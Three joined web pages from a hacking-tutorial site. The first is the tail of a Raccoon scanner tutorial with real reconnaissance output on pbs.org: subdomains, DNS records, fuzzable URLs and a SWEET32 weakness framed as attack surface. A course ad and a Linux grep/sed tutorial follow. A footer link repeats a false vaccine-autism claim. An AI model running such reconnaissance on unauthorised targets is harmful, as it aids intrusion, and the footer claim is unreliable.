Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 76:AD:A5:A1:7C:26:43:2E:5B:91:7F:42:72:21:FE:3C:FA:4F:48:3A X509v3 Authority Key Identifier: keyid:A8:4A:6A:63:04:7D:DD:BA:E6:D1:39:B7:A6:45:65:EF:F3:A8:EC:A1 Authority Information Access: OCSP - URI:http://ocsp.int-x3.letsencrypt.org CA Issuers - URI:http://cert.int-x3.letsencrypt.org/ X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org User Notice: Explicit Text: This Certificate may only be relied upon by Relying Parties and only in accordance with the Certificate Policy found at https://letsencrypt.org/repository/ CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : DB:74:AF:EE:CB:29:EC:B1:FE:CA:3E:71:6D:2C:E5:B9: AA:BB:36:F7:84:71:83:C7:5D:9D:4F:37:B6:1F:BF:64 Timestamp : Jul 5 09:31:20.892 2018 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:B9:61:FB:EC:BB:91:DA:DD:F3:F0:48: D4:61:B8:CB:09:A0:7F:20:6C:B7:1F:13:7B:EE:11:5C: 4F:CF:0E:6B:63:02:21:00:EC:C2:21:16:6E:90:E0:DA: FC:02:9A:FC:5A:3A:D0:92:38:8B:83:39:83:1D:3B:A9: FE:58:06:2C:4D:BF:74:3B Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 29:3C:51:96:54:C8:39:65:BA:AA:50:FC:58:07:D4:B7: 6F:BF:58:7A:29:72:DC:A4:C3:0C:F4:E5:45:47:F4:78 Timestamp : Jul 5 09:31:20.909 2018 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:A0:6B:4C:3D:0C:E3:35:B3:71:E1:E5: F2:70:89:7D:CD:A4:BA:F7:16:12:48:C5:A9:E7:DA:3A: EB:B3:E2:BB:46:02:21:00:95:29:A4:22:F5:A3:B0:66: C7:1A:71:1C:F9:95:6A:69:85:56:8B:08:E1:C8:3C:E7: 3B:23:1D:A2:D4:5B:F3:0C Signature Algorithm: sha256WithRSAEncryption 4f:ea:24:2f:7f:a9:a9:30:98:c4:61:b9:a2:eb:d3:93:87:43: 9d:b8:63:0a:2b:5a:cd:a4:cc:48:aa:c1:8d:35:2c:7c:8a:32: 9f:0b:f6:6f:d3:40:ab:d6:ae:df:d2:11:d5:ee:14:4f:43:64: 9d:f6:dd:77:7f:cb:39:a4:0a:db:d6:73:a5:c1:05:4c:d2:ac: 93:ea:61:ed:ac:12:19:2d:a2:20:0b:c9:8e:dc:9f:cb:f4:c8: fd:d6:66:be:44:c4:16:ff:c8:c9:e0:0c:d6:8d:e2:13:58:24: 9b:c8:51:c7:a0:33:41:3b:32:3d:4e:29:08:84:6e:42:d5:63: 56:ba:a7:35:89:8c:2c:6c:5c:bf:8d:75:38:3b:f4:1a:cc:3d: 2d:b8:d9:07:b5:39:78:06:4e:d3:c2:1b:45:15:e4:ff:3d:50: 2e:74:0d:c4:df:2c:19:24:04:96:21:46:98:61:47:9d:eb:a1: 55:a7:c5:72:41:0b:40:f3:80:2e:17:98:27:b6:5a:58:cf:ae: e2:d5:95:2f:b6:a9:15:7b:51:48:33:e4:a3:f2:60:3a:80:eb: 62:08:5c:08:c7:2d:9c:a2:d8:e9:3c:e4:d6:9a:f9:ae:c1:1a: d1:d4:ec:fe:1f:8f:2e:24:cc:4e:76:26:96:22:28:9c:e5:a0: 39:73:15:de -------------------------------------------------------------------------------- non-SNI Data: TLSv1: True TLSv1.1: True TLSv1.2: True SANs: --------------- git.pbs.org login.pbs.org projects.pbs.org ga.video.cdn.pbs.org dipsy-tc.pbs.org whut-qa.svp.pbs.org heart.ops.pbs.org player.pbs.org jaws.pbs.org kids.pbs.org account.pbs.org teacherline.pbs.org www-cache.pbs.org image.pbs.org admin.pbs.org koth-qa.svp.pbs.org urs.pbs.org ops.pbs.org wnet.video-staging.pbs.org weta-qa.svp.pbs.org sentry.pbs.org video.pbs.org wnet.video-qa.pbs.org www.pbs.org docs.pbs.org pbs.org --------------- Same as SNI CertificateThis is a lot of information! Most importantly, we have gotten a warning about a high severity vulnerability in the transportation layer security of the website. In the report, we see the following warning:64-bit block cipher 3DES vulnerable to SWEET32 attackThis vulnerability, known as the "sweet 32" attack orCVE-2016-2183, could allow an attacker to intercept and modify traffic between a visitor to the website and the server. We reported this vulnerability to pbs.org during the course of making this article.Next, we can take a look at the dns_records.txt file to learn more information about IP addresses.[1;32m[v][0;0m Writing DNS query results A 54.225.198.196 54.225.206.152 MX 10 mxgw2.pbs.org. 20 mxgw1.pbs.org. NS ns1.p10.dynect.net. ns2.p10.dynect.net. ns4.p10.dynect.net. ns3.p10.dynect.net. SOA ns1.p10.dynect.net. dnssupport.verisign-grs.com. 1534492239 3600 600 604800 1800 TXT "HOLciSiucyx9z9GJ0guhSicbiLe0Rm3WCSDQVy0AHuanMAOgr82WpdSHdFOw0HqcSaW6kuo5DAegSm0PC1ALJg==" "detectify-verification=1583bf00b85b6570195c4ec81a2625ae" "MS=ms58428140" "v=spf1 include:stspg-customer.com a:listserv.pbs.org a:smtp1.pbs.org a:smtp2.pbs.org a:mxout.pbs.org a:servers.mcsv.net include:k12msg.com ip4:184.173.19.244/30 ~all" "status-page-domain-verification=g90gln3s127q" "facebook-domain-verification=hxcquifih7vsf9z0u39e2t2ks317j6" [1;32m[v][0;0m Writing DNS query results A 54.225.206.152 54.225.198.196 MX 20 mxgw1.pbs.org. 10 mxgw2.pbs.org. NS ns3.p10.dynect.net. ns4.p10.dynect.net. ns1.p10.dynect.net. ns2.p10.dynect.net. SOA ns1.p10.dynect.net. dnssupport.verisign-grs.com. 1534979967 3600 600 604800 1800 TXT "HOLciSiucyx9z9GJ0guhSicbiLe0Rm3WCSDQVy0AHuanMAOgr82WpdSHdFOw0HqcSaW6kuo5DAegSm0PC1ALJg==" "detectify-verification=1583bf00b85b6570195c4ec81a2625ae" "v=spf1 include:stspg-customer.com a:listserv.pbs.org a:smtp1.pbs.org a:smtp2.pbs.org a:mxout.pbs.org a:servers.mcsv.net include:k12msg.com ip4:184.173.19.244/30 ~all" "facebook-domain-verification=hxcquifih7vsf9z0u39e2t2ks317j6" "status-page-domain-verification=g90gln3s127q" "MS=ms58428140"This gives us information about the email server the domain uses, the IP addresses involved in serving users, and other important domains like "dynect.net" which could lead us to information about hosting and infrastructure providers.Next, we can take a look at the software powering the website inside the "web_scan" report. We also get information about email addresses discovered, fuzzable URLs, and HTML forms along with form methods discovered. This could help us in automating an attack against the website by studying the underlying software.[1;34m[#][0;0m Trying to collect pbs.org web application data [1;32m[v][0;0m CMS detected: target is using [1;32mDjango Framework[0;0m [1;32m[v][0;0m Found robots.txt [1;32m[v][0;0m Web server detected: [1;32mnginx[0;0m [93m[!][0;0m 28 fuzzable URLs discovered http://to.pbs.org/2mFOyNc?utm_source=carousel_bundle_3&utm_medium=related_link_3&utm_campaign=pbs_homepage http://www.pbs.org/value/home/?utm_source=carousel_bundle_3&utm_medium=premiere_link&utm_campaign=pbs_homepage https://www.twitter.com/intent/tweet?url=https://www.pbs.org/video/our-man-in-tehran-part-one-p9eu3w&text=Check%20out%20this%20video%20from%20@PBS:%20FRONTLINE,%20Our%20Man%20in%20Tehran%20%28Part%20One%29 https://shop.pbs.org/?utm_source=PBS&utm_medium=Link&utm_campaign=pbs_home_footer_shoplink https://www.twitter.com/intent/tweet?url=https://www.pbs.org/video/the-final-7d9s6z&text=Check%20out%20this%20video%20from%20@PBS:%20The%20Great%20British%20Baking%20Show,%20The%20Final https://shop.pbs.org/?utm_source=PBS&utm_medium=Link&utm_campaign=pbs_home_shopbuttontopnav http://to.pbs.org/2m7l6fD?utm_source=carousel_bundle_3&utm_medium=related_link_2&utm_campaign=pbs_homepage https://account.pbs.org/oauth2/social/login/google-oauth2/?scope=account+vppa&redirect_uri=https://www.pbs.org/login/&response_type=code&client_id=LXLFIaXOVDsfS850bnvsxdcLKlvLStjRBoBWbFRE https://shop.pbs.org/digital-downloads?utm_source=PBS&utm_medium=Link&utm_campaign=pbs_home_footer_digital https://shop.pbs.org/drama-and-arts-best-sellers?utm_source=PBS&utm_medium=Link&utm_campaign=pbs_home-show_module_20OffDramaArts_AUG18 https://www.facebook.com/sharer/sharer.php?u=https://www.pbs.org/video/trailer-g7chzs&t=The%20Miniaturist,%20Trailer https://www.twitter.com/intent/tweet?url=https://www.pbs.org/video/shields-and-brooks-1534525761&text=Check%20out%20this%20video%20from%20@PBS:%20PBS%20NewsHour,%20Shields%20and%20Brooks%20on%20%E2%80%98reality%20show%E2%80%99%20rules https://www.facebook.com/sharer/sharer.php?u=https://www.pbs.org/video/our-man-in-tehran-part-two-7elm5x&t=FRONTLINE,%20Our%20Man%20in%20Tehran%20%28Part%20Two%29 https://www.facebook.com/sharer/sharer.php?u=https://www.pbs.org/video/our-man-in-tehran-part-one-p9eu3w&t=FRONTLINE,%20Our%20Man%20in%20Tehran%20%28Part%20One%29 https://www.twitter.com/intent/tweet?url=https://www.pbs.org/video/our-man-in-tehran-part-two-7elm5x&text=Check%20out%20this%20video%20from%20@PBS:%20FRONTLINE,%20Our%20Man%20in%20Tehran%20%28Part%20Two%29 https://account.pbs.org/oauth2/register/?next=%2Foauth2%2Fauthorize%2F%3Fscope%3Daccount%2Bvppa%26redirect_uri%3Dhttps%3A%2F%2Fwww.pbs.org%2Flogin%2F%26response_type%3Dcode%26client_id%3DLXLFIaXOVDsfS850bnvsxdcLKlvLStjRBoBWbFRE%26confirmed%3D1 https://account.pbs.org/oauth2/social/login/facebook/?scope=account+vppa&redirect_uri=https://www.pbs.org/login/&response_type=code&client_id=LXLFIaXOVDsfS850bnvsxdcLKlvLStjRBoBWbFRE http://www.pbs.org/value/home/?utm_source=carousel_bundle_3&utm_medium=related_link_1&utm_campaign=pbs_homepage http://www.pbs.org/value/home/?utm_source=carousel_bundle_3&utm_medium=headline&utm_campaign=pbs_homepage https://www.facebook.com/sharer/sharer.php?u=https://www.pbs.org/video/shields-and-brooks-1534525761&t=PBS%20NewsHour,%20Shields%20and%20Brooks%20on%20%E2%80%98reality%20show%E2%80%99%20rules http://www.pbs.org/value/home/?utm_source=carousel_bundle_3&utm_medium=image&utm_campaign=pbs_homepage https://account.pbs.org/oauth2/authorize/?scope=account+vppa&redirect_uri=https://www.pbs.org/login/&response_type=code&client_id=LXLFIaXOVDsfS850bnvsxdcLKlvLStjRBoBWbFRE https://shop.pbs.org/?utm_source=PBS&utm_medium=Link&utm_campaign=pbs_home_shopbuttontopnav_dropdown_shophomepage https://www.facebook.com/sharer/sharer.php?u=https://www.pbs.org/video/the-final-7d9s6z&t=The%20Great%20British%20Baking%20Show,%20The%20Final https://www.twitter.com/intent/tweet?url=https://www.pbs.org/video/trailer-g7chzs&text=Check%20out%20this%20video%20from%20@PBS:%20The%20Miniaturist,%20Trailer http://www.pbs.org/value/home/?utm_source=carousel_bundle_3&utm_medium=short_description&utm_campaign=pbs_homepage https://shop.pbs.org/digital-downloads?utm_source=PBS&utm_medium=Link&utm_campaign=pbs_home_shopbuttontopnav_dropdown_digital https://plus.google.com/share?url=https://www.pbs.org/video/trailer-g7chzs [93m[!][0;0m 1 email addresses discovered ?subject=Check out this video from PBS: Trailer&body=I thought you might like this: https://www.pbs.org/video/trailer-g7chzs [93m[!][0;0m 2 HTML forms discovered Form details: ID: None, Class: ['dropdown', 'nav-item--search__form', 'an-18_2'], Method: None, action: /search/ Form details: ID: None, Class: ['dropdown', 'nav-item--search__form', 'an-18_2'], Method: None, action: /search/ [1;34m[#][0;0m Trying to collect pbs.org web application data [1;32m[v][0;0m CMS detected: target is using [1;32mDjango Framework[0;0m [1;32m[v][0;0m Found robots.txt [1;32m[v][0;0m Web server detected: [1;32mnginx[0;0m [93m[!][0;0m 28 fuzzable URLs discovered http://to.pbs.org/2mFOyNc?utm_source=carousel_bundle_3&utm_medium=related_link_3&utm_campaign=pbs_homepage https://www.facebook.com/sharer/sharer.php?u=https://www.pbs.org/video/our-man-in-tehran-part-one-p9eu3w&t=FRONTLINE,%20Our%20Man%20in%20Tehran%20%28Part%20One%29 https://plus.google.com/share?url=https://www.pbs.org/video/trailer-g7chzs https://shop.pbs.org/digital-downloads?utm_source=PBS&utm_medium=Link&utm_campaign=pbs_home_shopbuttontopnav_dropdown_digital http://to.pbs.org/2m7l6fD?utm_source=carousel_bundle_3&utm_medium=related_link_2&utm_campaign=pbs_homepage https://www.twitter.com/intent/tweet?url=https://www.pbs.org/video/first-look-wd8rsm&text=Check%20out%20this%20video%20from%20@PBS:%20Poldark,%20First%20Look https://shop.pbs.org/digital-downloads?utm_source=PBS&utm_medium=Link&utm_campaign=pbs_home_footer_digital https://shop.pbs.org/?utm_source=PBS&utm_medium=Link&utm_campaign=pbs_home_shopbuttontopnav https://www.twitter.com/intent/tweet?url=https://www.pbs.org/video/shields-and-brooks-1534525761&text=Check%20out%20this%20video%20from%20@PBS:%20PBS%20NewsHour,%20Shields%20and%20Brooks%20on%20%E2%80%98reality%20show%E2%80%99%20rules https://www.facebook.com/sharer/sharer.php?u=https://www.pbs.org/video/shields-and-brooks-1534525761&t=PBS%20NewsHour,%20Shields%20and%20Brooks%20on%20%E2%80%98reality%20show%E2%80%99%20rules https://account.pbs.org/oauth2/authorize/?scope=account+vppa&redirect_uri=https://www.pbs.org/login/&response_type=code&client_id=LXLFIaXOVDsfS850bnvsxdcLKlvLStjRBoBWbFRE http://www.pbs.org/value/home/?utm_source=carousel_bundle_3&utm_medium=short_description&utm_campaign=pbs_homepage https://account.pbs.org/oauth2/social/login/facebook/?scope=account+vppa&redirect_uri=https://www.pbs.org/login/&response_type=code&client_id=LXLFIaXOVDsfS850bnvsxdcLKlvLStjRBoBWbFRE http://www.pbs.org/value/home/?utm_source=carousel_bundle_3&utm_medium=headline&utm_campaign=pbs_homepage https://www.facebook.com/sharer/sharer.php?u=https://www.pbs.org/video/first-look-wd8rsm&t=Poldark,%20First%20Look https://www.twitter.com/intent/tweet?url=https://www.pbs.org/video/trailer-g7chzs&text=Check%20out%20this%20video%20from%20@PBS:%20The%20Miniaturist,%20Trailer https://shop.pbs.org/pbs-best-sellers?utm_source=PBS&utm_medium=Link&utm_campaign=pbs_home-show_module_15Off6920Off9925Off150_AUG18 http://www.pbs.org/value/home/?utm_source=carousel_bundle_3&utm_medium=premiere_link&utm_campaign=pbs_homepage https://shop.pbs.org/?utm_source=PBS&utm_medium=Link&utm_campaign=pbs_home_shopbuttontopnav_dropdown_shophomepage https://account.pbs.org/oauth2/social/login/google-oauth2/?scope=account+vppa&redirect_uri=https://www.pbs.org/login/&response_type=code&client_id=LXLFIaXOVDsfS850bnvsxdcLKlvLStjRBoBWbFRE https://www.facebook.com/sharer/sharer.php?u=https://www.pbs.org/video/trailer-g7chzs&t=The%20Miniaturist,%20Trailer https://www.twitter.com/intent/tweet?url=https://www.pbs.org/video/our-man-in-tehran-part-one-p9eu3w&text=Check%20out%20this%20video%20from%20@PBS:%20FRONTLINE,%20Our%20Man%20in%20Tehran%20%28Part%20One%29 https://shop.pbs.org/?utm_source=PBS&utm_medium=Link&utm_campaign=pbs_home_footer_shoplink http://www.pbs.org/value/home/?utm_source=carousel_bundle_3&utm_medium=related_link_1&utm_campaign=pbs_homepage https://account.pbs.org/oauth2/register/?next=%2Foauth2%2Fauthorize%2F%3Fscope%3Daccount%2Bvppa%26redirect_uri%3Dhttps%3A%2F%2Fwww.pbs.org%2Flogin%2F%26response_type%3Dcode%26client_id%3DLXLFIaXOVDsfS850bnvsxdcLKlvLStjRBoBWbFRE%26confirmed%3D1 http://www.pbs.org/value/home/?utm_source=carousel_bundle_3&utm_medium=image&utm_campaign=pbs_homepage https://www.facebook.com/sharer/sharer.php?u=https://www.pbs.org/video/the-final-7d9s6z&t=The%20Great%20British%20Baking%20Show,%20The%20Final https://www.twitter.com/intent/tweet?url=https://www.pbs.org/video/the-final-7d9s6z&text=Check%20out%20this%20video%20from%20@PBS:%20The%20Great%20British%20Baking%20Show,%20The%20Final [93m[!][0;0m 1 email addresses discovered ?subject=Check out this video from PBS: Trailer&body=I thought you might like this: https://www.pbs.org/video/trailer-g7chzs [93m[!][0;0m 2 HTML forms discovered Form details: ID: None, Class: ['dropdown', 'nav-item--search__form', 'an-18_2'], Method: None, action: /search/ Form details: ID: None, Class: ['dropdown', 'nav-item--search__form', 'an-18_2'], Method: None, action: /search/You can learn more information about the web application firewall in the "WAF.txt" report, but our scan did not detect one.Basic information about the registered domain owner can also be found under the "whois.txt" report, although many times this registration information is just for the company who registered the domain on behalf of the customer.Recon Is an Essential Part of Any PlanBy using Raccoon scanner, a hacker can streamline an attack according to the surface area discovered in an initial scan. Because Raccoon scanner includes the ability to scan through a Tor relay, it's an exciting and subtle tool for compiling a lot of targeting data about a domain in an extremely short period of time.For a red team or for a blue team looking to understand their publically exposed attack surface, Raccoon hits the sweet spot between Maltego and Nmap for OSINT recon on domain targets.Don't Miss:Use Maltego to Target Company Email Addresses That May Be Vulnerable from Third-Party BreachesI hope you enjoyed this guide to using Raccoon scanner to gather OSINT data on a target domain! If you have any questions about this tutorial on Raccoon scanner or you have a comment, feel free to reach me in the comments below or on [email protected] Null Byte onTwitter,Flipboard, andYouTubeSign up forNull Byte's weekly newsletterFollow WonderHowTo onFacebook,Twitter,Pinterest, andFlipboardWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover photo and screenshots by Kody/Null ByteRelatedRecon:How to Research a Person or Organization Using the Operative FrameworkHow To:Use Photon Scanner to Scrape Web OSINT DataHow To:Use Maltego to Fingerprint an Entire Network Using Only a Domain NameHow To:Hunt Down Social Media Accounts by Usernames with SherlockHow To:Uncover Hidden Subdomains to Reveal Internal Services with CT-ExposerHow To:Use the Buscador OSINT VM for Conducting Online InvestigationsHow To:Probe Websites for Vulnerabilities More Easily with the TIDoS FrameworkVideo:How to Use Maltego to Research & Mine Data Like an AnalystHow To:Conduct Recon on a Web Target with Python ToolsHack Like a Pro:How to Use Maltego to Do Network ReconnaissanceHow To:Identify Web Application Firewalls with Wafw00f & NmapHow To:Find Identifying Information from a Phone Number Using OSINT ToolsHow To:Use Maltego to Target Company Email Addresses That May Be Vulnerable from Third-Party BreachesHack Like a Pro:How to Conduct OS Fingerprinting with Xprobe2How To:Scrape Target Email Addresses with TheHarvesterHack Like a Pro:How to Conduct Passive Reconnaissance of a Potential TargetNews:Rare Raccoon Parasite Causing Blindness & Severe Brain Damage Could Be More Widespread Than We KnewHack Like a Pro:Reconnaissance with Recon-Ng, Part 1 (Getting Started)How To:Play the Recon sniper character class in Battlefield Bad Company 2: VietnamHow To:Track Down a Tinder Profile with Location Spoofing on Google ChromeHow To:Craft a Realistic Rocket Raccoon Costume for HalloweenHow To:Find OSINT Data on License Plate Numbers with SkiptracerHow To:Download APK Files to Sideload on Any Android DeviceHow To:Discover Open Ports Using Metasploit's Built-in Port ScannerNews:How to Study for the White Hat Hacker Associate Certification (CWA)Hack Like a Pro:How to Conduct Active Reconnaissance and DOS Attacks with NmapHow To:Mine Twitter for Targeted Information with TwintHow To:Install Incompatible Apps from Google Play onto Your Android DeviceHow To:Detect Vulnerabilities in a Web Application with UniscanHow To:Use Metasploit's WMAP Module to Scan Web Applications for Common VulnerabilitiesMac for Hackers:How to Organize Your Tools by Pentest StagesHack Like a Pro:How to Hack Like the NSA (Using Quantum Insert)News:Raccoon RenegadeNews:Police Admit To Drugging Occupy Wall Street Protesters; Suspend ProgramNews:Court Orders TSA to Explain Why It Continues to Defy the LawVaccine bombshell:Baby monkeys develop autism after routine CDC vaccinationsNews:The Advanced Technology of the New Airport ScannersNews:3D Laser Scanner from Trash
This Master Course Bundle on Coding Is Just $34.99 Β« Null Byte :: WonderHowTo
Whether you're already coding from home or are seeking help as a beginner, now is a great time to find a lucrative job in programming. TheBureau of Labor Statisticsreports that more than 200,000 jobs were created in computer programming in 2019, with a median pay of more than $85,000, and the number is only set to grow over time. If you want to learn to code,The Master Learn to Code 2021 Certification Bundleis your ticket.Dive into nearly 120 hours of course content on HTML, data science, different programming languages, and much more. The bundle includes 13 courses from instructors like Tony Staunton (4.2/5 instructor rating), Zenva Academy (4.4/5 instructor rating), and Rob Percival (4.5/5 instructor rating). You'll get crash courses in web development using tools like JavaScript and Ruby on Rails, software development with C++ and C#, data science and machine learning using Python and Scala, and much more.Valued at more than $2,500, these 13 courses are almost like a complete computer science education in one place. Get The Master Learn to Code 2021 Certification Bundle forjust $34.99today.Get the Deal:The Master Learn to Code 2021 Certification Bundle for Just $34.99Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedHow To:Learn to Code with a Bundle That Fits Your ScheduleHow To:Start Managing Your Money & Investments Like a Pro with This Affordable Course BundleHow To:Learn to Code for Less Than $40How To:Learn to Code Your Own Games with This Hands-on BundleHow To:Learn the Most Widely Used Programming Language for $35How To:Become a Productivity Master with Google Apps ScriptHow To:Make Your New Year's Resolution to Master Azure with This BundleDeal Alert:Grab This Microsoft Office Beginner's Guide for Only $35How To:Learn Coding in Just One Hour a Day with This Top-Rated CourseHow To:Become a Data Wizard with This Microsoft Excel & Power BI TrainingHow To:Start 2021 with a New Coding Career with This Ultimate Set of Web Developer CoursesDeal Alert:Learn the Basics of C++, Node.js, Adobe Mixamo & Unity for the Price of a ChromecastHow To:This Python Bundle Can Teach You Everything You Need to KnowHow To:This Course Bundle Will Teach You How to Start & Grow a BusinessHow To:Get Trained in UX Design with This BundleHow To:This Top-Rated Bundle Will Help You Kick-Start a More Productive LifeHow To:Expand Your Coding Skill Set with This 10-Course Training BundleDeal Alert:Learn to Code for Only $39 While You're Stuck at HomeHow To:Start Learning How to Code in Just a WeekHow To:Add MATLAB to Your Programming Toolkit with This BundleHow To:10 Coding, SEO & More Courses on Sale Right Now That Will Turn You into a Pro DeveloperHow To:Become a Master Problem Solver by Learning Data Analytics at HomeHow To:Expand Your Coding Skill Set by Learning How to Build Games in UnityHow To:Harness the Power of Big Data with This 10-Course BundleHow To:Master Python, Django, Git & GitHub with This BundleNews:You Can Master Adobe's Hottest Tools from Home for Only $34How To:The One Engineering Certification You Don't Want to MissHow To:Take a Deep Dive into AI with This 4-Course BundleHow To:Learn How to Create Fun PC & Mobile Games for Under $30How To:Master Adobe's Top Design Tools for Under $50 Right NowHow To:Take the First Step Towards an In-Demand & Lucrative Career in IT for Under $35How To:Learn to Draw Like a Pro for Under $40How To:Learn C# & Start Designing Games & AppsHow To:Learn How to Join the AI Revolution with These CoursesDeal Alert:Learn the Stock Market Inside & Out for Under 30 BucksHow To:Get Project Manager Certifications with Help from Scrum, Agile & PMPNews:The Best Cyber Monday Tech Deals on TVs, Phones, Laptops, & MoreHow To:Learn How to Play the Market with This Data-Driven Trading BundleHow To:Gain Experience Coding for a Price You DecideHow To:Learn the Most Used Coding Languages for $30
Hack Like a Pro: Linux Basics for the Aspiring Hacker, Part 10 (Manipulating Text) Β« Null Byte :: WonderHowTo
Welcome back, my aspiring hackers!As mentioned several times inprevious Linux tutorials, nearly everything in Linux is a file, and very often they are text files. For instance, all of the configuration files in Linux are text files. To reconfigure an application in Linux, we simply need to open the configuration file, change the text file, re-save, and then restart the application and our reconfiguration is applied.With so many text files, manipulating text becomes crucial in managing Linux and Linux applications. In this tutorial, we'll look at several of the commands and techniques for manipulating text in Linux. For demonstration purposes, we'll use files from the world's best NIDS,Snort.Step 1: Cat That FileAs demonstrated in anearlier tutorial,catis probably the most basic text display command. Let's cat the Snort config file found in/etc/snort.cat /etc/snort/snort.confAs you can see, the snort.conf is displayed on our screen until it comes to the end of the file. Not the most convenient way to work with this file.Step 2: Take the HeadIf we just want to view the beginning of a file, we can use theheadcommand. This command displays the first 10 lines of a file, by default.head /etc/snort/snort.confIf we want to see more or less than the default 10 lines, we can tell head how many lines we want to see by putting the number of lines we want to see (with the-switch) between the command and the file name.head -30 /etc/snort/snort.confHere we can see that only the first 30 lines of snort.conf are displayed.Step 3: Grab That TailSimilar to the head command, we view the last lines of a file by using thetailcommand. Let's use it on the snort.conf.tail /etc/snort/snort.confNotice that it displays some of the last "includes" of the rules files, but not all of them. Let's now see if we can display all the rule "includes" by grabbing the last 40 lines of the snort.conf.tail -40 /etc/snort/snort.confNow we can view nearly all the rule includes all on one screen.Step 4: Numbering Those LinesSometimesβ€”especially with very long filesβ€”we may want the file displayed with line numbers. This is probably the case with the snort.conf, as it has 838 lines. This makes it easier to reference changes and come back to the same place within a file. To display a file with line number, we simply type:nl snort.confNote that each line now has a number making referencing much easier.Step 5: I Grep ThatAfter cat,grepis probably the most widely used text manipulation command. It's a filtering command; in other words, it enables us to filter the content of a file for display. If for instance, we wanted to see all the instances of where the word "database" occurs in our snort.conf file, we could ask cat to only display those lines where it occurs by typing:cat /etc/snort/ snort.conf | grep databaseThis command will first grab the snort.conf and then "pipe" it (|) to grep which will take it as input and then look for the occurrences of the word "database" and only display those lines. Grep is a powerful and essential command for working in Linux as it can save us hours searching for every occurrence of a word or command.Step 6: I Sed That WorksThesedcommand essentially allows us to search for occurrences of a word or text pattern and then do some work on it. The name comes from the concept of a stream editor and is a contraction of those two words. In its most basic form, sed operates like the find and replace function in Windows. Let's search for the word "mysql" in the snort.conf file using grep.cat /etc/snort/snort.conf | grep mysqlWe can see that the grep command found five occurrences of the word mysql.Let's say we want sed to replace every occurrence of mysql and with MySQL (remember, Linux is case sensitive) and then save the new file to snort2.conf. We could do this by typing:sed s/mysql/MySQL/g snort.conf > snort2.confThis command says, "search (s) for the word mysql and replace it with the word MySQL globally (i.e. wherever you find it in the file)."Now, when we grep snort2.conf for mysql, we see that none were found and when we grep for MySQL, we find five occurrences of MySQL.cat /etc/snort/snort.conf | grep MySQLIf we just want to replace only the first occurrence of the word mysql, we could leave out the trailinggand it would only replace the first occurrence.sed s/mysql/MySQL/ snort.conf > snort2.confThe sed command can also be used to find and replace any specific occurrence of a word. For instance, if I want to only replace the third occurrence of the word mysql, I can simply place the number of the occurrence at the end of the command and sed will only replace the third occurrence of the word "mysql" with "MySQL".sed s/mysql/MySQL/3 snort.conf > snort2.confStay Tuned for MoreThat's it for this lesson, but there are many more to come, so check out our section onlearning Linux basicsto stay up to date. If you have any questions on using sed, cat, head, tail, nl, or grep, ask away in the comments below. You can also visit theNull Byte forumfor help on unrelated matters.Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseOriginal penguin eyeimage via ShutterstockRelatedNews:How to Study for the White Hat Hacker Associate Certification (CWA)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 11 (Apache Web Servers)How To:The Essential Skills to Becoming a Master HackerHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 6 (Networking Basics)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 1 (Getting Started)Hack Like a Pro:Scripting for the Aspiring Hacker, Part 3 (Windows PowerShell)How to Hack Like a Pro:Getting Started with MetasploitNews:What to Expect from Null Byte in 2015Hack Like a Pro:Perl Scripting for the Aspiring Hacker, Part 1Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 13 (Mounting Drives & Devices)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 12 (Loadable Kernel Modules)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 22 (Samba)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 25 (Inetd, the Super Daemon)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 21 (GRUB Bootloader)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 2 (Creating Directories & Files)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 24 (The Linux Philosophy)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 17 (Client DNS)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 9 (Managing Environmental Variables)Hack Like a Pro:Linux Basics for the Aspiring Hacker, Part 5 (Installing New Software)Hack Like a Pro:An Introduction to Regular Expressions (Regex)Hack Like a Pro:Finding Potential SUID/SGID Vulnerabilities on Linux & Unix SystemsHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 23 (Logging)Goodnight Byte:HackThisSite Walkthrough, Part 9 - Legal Hacker TrainingGoodnight Byte:HackThisSite Walkthrough, Part 6 - Legal Hacker TrainingGoodnight Byte:HackThisSite Walkthrough, Part 10 - Legal Hacker TrainingCommunity Byte:HackThisSite Walkthrough, Part 9 - Legal Hacker TrainingCommunity Byte:HackThisSite Walkthrough, Part 10 - Legal Hacker TrainingGoodnight 